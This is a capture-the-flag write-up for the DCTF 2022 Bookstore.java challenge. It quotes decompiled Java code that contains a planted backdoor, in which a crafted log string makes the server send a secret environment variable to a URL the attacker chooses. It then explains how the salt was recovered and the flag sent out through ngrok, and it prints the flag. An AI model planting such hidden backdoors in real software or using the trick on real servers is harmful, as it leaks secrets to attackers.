I took part to the DCTF 2022 with the team Ulisse from the University of Bologna.
The Bookstore.java challenge stated that:
Web developer left the company becouse he was not being paid. He left some hidden features for him, to bypass security. Can you find the vunerability? http://book-store.dragonsec.si
And gave us a book_store.jar file.
The Log4Book
If we open the jarfile with a decompiler (like JD-GUI) we can see that there is a vulnerability in the log analyzer.
Pattern pattern2 = Pattern.compile("get\\{.*\\}salt=" + System.getenv("SALT"));
Matcher matcher2 = pattern2.matcher(mssg);
String substring2 = null;
if (matcher2.find()) {
substring2 = matcher2.group();
}
if (substring2 != null) {
downloadFile(substring2.substring(substring2.indexOf(123) + 1, substring2.indexOf(125)));
}
If the log string contains the template get{...}salt= plus the environment var SALT the program tries to send an HTTP request to the url between {...} with the header Not-Found: and the env var NOT_FOUND as the value (which I suppose is the flag).
URL link = new URL(url);
link.toURI();
HttpURLConnection conn = (HttpURLConnection) link.openConnection();
conn.setRequestMethod("GET");
conn.setRequestProperty("not-found", System.getenv("NOT_FOUND"));
Finding the SALT environment value
We're given a hint:
Method how the salt is generated is given through variable names in one java class. The salt is 8 chars long.
If we look at the class Art we can see that there are two strange variable names:
> String frequency = fontType.getValue();
int analysis_should_be_fun = findImageWidth(textHeight, artText, frequency);
which create: frequency analysis should be fun
Analyzing the frequency
Inside the jar we find a book.json file, which has 8 paragraphs of a shakespearian play.
After trying to find some studies about the frequency analisis of Shakespeare plays without any result, we remember that the hint stated that the salt is 8 chars and there are exactly 8 paragraphs in the page presented in the website and in the file book.json.
If we join the most repeated letter of each paragraph, we get the salt and then we can get the program to ping our url (ngrok) with the flag.
Salt:
oeeeeoooFlag:
dctf{L0g_4_hid3n_d@7@\_n0t\_s0\_h@rd_righ7}
Top comments (0)